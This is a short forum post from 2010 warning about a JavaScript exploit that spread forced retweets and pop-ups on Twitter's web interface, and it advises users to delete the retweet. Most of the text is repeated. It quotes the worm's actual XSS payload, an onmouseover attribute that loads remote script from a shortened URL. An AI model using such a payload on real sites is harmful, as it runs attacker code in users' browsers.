21-09-2010, 07:52 PM
A JavaScript exploit has allowed all kinds of not-at-all-safe-for-work sites to pop up sites and text through Twitter.com, and force a re-tweet, even if all a user does is move their mouse over a particular link. Update: It's been fixed.
The exploit has spread to thousands of accounts now—some with hardcore porn pop-ups, other with jokey references to the exploit—so stick with a third-party Twitter client for the time being to read and send your short updates.
The one that hit me is this one :
If 1 hits you, dont panic, just goto http://www.twitter.com/user and delete that latest RT. Thats it. Done and dont use WebUI until any specific info from Twitter on this matter.
Note: "user" must be replaced by actual username.
Use Twitter clients rather than web UI for Twitter for now.
The exploit has spread to thousands of accounts now—some with hardcore porn pop-ups, other with jokey references to the exploit—so stick with a third-party Twitter client for the time being to read and send your short updates.
The one that hit me is this one :
Quote:http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl5d3')"/
If 1 hits you, dont panic, just goto http://www.twitter.com/user and delete that latest RT. Thats it. Done and dont use WebUI until any specific info from Twitter on this matter.
Note: "user" must be replaced by actual username.
Use Twitter clients rather than web UI for Twitter for now.